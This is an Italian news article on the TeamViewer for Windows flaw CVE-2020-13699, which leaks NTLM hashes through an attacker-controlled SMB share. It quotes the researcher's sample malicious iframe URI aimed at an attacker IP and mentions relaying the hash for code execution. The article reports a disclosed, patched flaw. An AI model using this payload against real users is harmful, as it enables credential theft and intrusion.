Vulnerabilità In TeamViewer Può Permettere Agli Hacker Di Rubare La Password Di Sistema

TeamViewer ha recentemente corretto una vulnerabilità ad alto rischio nella sua app desktop per Windows rilasciando una nuova versione del suo software, che se sfruttata, potrebbe consentire agli attaccanti remoti di rubare la password del sistema e potenzialmente sfruttarla.

Ciò che è ancora più preoccupante è che questo attacco non richiede l’interazione della vittima e può essere eseguito quasi automaticamente.

Per chi non lo sapesse, TeamViewer è un’applicazione software popolare sviluppata dalla società tedesca TeamViewer GmbH, per il controllo remoto, la condivisione del desktop, le riunioni online, la videoconferenza e il trasferimento di file tra computer.

È disponibile per i sistemi operativi Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 e BlackBerry. È anche possibile accedere a un sistema che esegue TeamViewer tramite un browser web.

La grave vulnerabilità soprannominata CVE-2020-13699 è stata scoperta per la prima volta da Jeffrey Hofmann, un ricercatore di sicurezza di Praetorian. Secondo il ricercatore, la vulnerabilità risiede in TeamViewer per Windows nel modo in cui l’applicazione cita il suo URI personalizzato (Unquoted URI handler).

L’esperto ha scoperto che il problema potrebbe consentire a un attaccante di costringere il software a inoltrare una richiesta di autenticazione NTLM al sistema dell’attaccante. In altre parole, un attaccante può forzare lo schema URI di TeamViewer da una pagina web per ingannare l’applicazione installata sul sistema della vittima a iniziare una connessione con la condivisione SMB remota di proprietà dell’attaccante.

Questo attiva il processo di autenticazione SMB, che a sua volta, farà trapelare il nome utente del sistema e la versione hash NTLMv2 della password agli attaccanti.

Per sfruttare con successo CVE 2020-13699, l’attaccante deve incorporare un iframe malevolo su un sito web e poi ingannare le vittime a visitare quell’URL creato malevolmente. Una volta che le vittime cliccano sul link, TeamViewer avvierà automaticamente il suo client desktop per Windows e aprirà una condivisione SMB remota.

“Un attaccante potrebbe incorporare un iframe malevolo in un sito web con un URL creato (iframe src=’teamviewer10: –play \attacker-IPileake.tvs’) che avvierebbe il client desktop di TeamViewer per Windows e lo costringerebbe ad aprire una condivisione SMB remota,” ha spiegato Jeffrey Hofmann in un avviso.

“Windows eseguirà l’autenticazione NTLM quando apre la condivisione SMB e quella richiesta può essere inoltrata (utilizzando uno strumento come responder) per l’esecuzione di codice (o catturata per la decifratura dell’hash).”

Questa vulnerabilità colpisce “URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, e tvvpn1,” ha detto Hofmann.

A seguito della divulgazione della vulnerabilità, il progetto TeamViewer ha corretto il difetto citando i parametri passati dagli URI handlers interessati, ad esempio, URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.

Per correggere il difetto, “Abbiamo implementato alcuni miglioramenti nella gestione degli URI relativi a CVE 2020-13699,” ha dichiarato TeamViewer in una nota. “Grazie, Jeffrey Hofmann di Praetorian, per la tua professionalità e per aver seguito un modello di divulgazione responsabile. Siamo grati che tu ci abbia contattato e che tu abbia potuto confermare la correzione delle tue scoperte nell’ultima versione.”

Per affrontare il problema, TeamViewer ha rilasciato la versione 15.8.3 e raccomanda ai suoi utenti di aggiornare immediatamente a questa versione.

Leggi anche - Migliori alternative a Teamviewer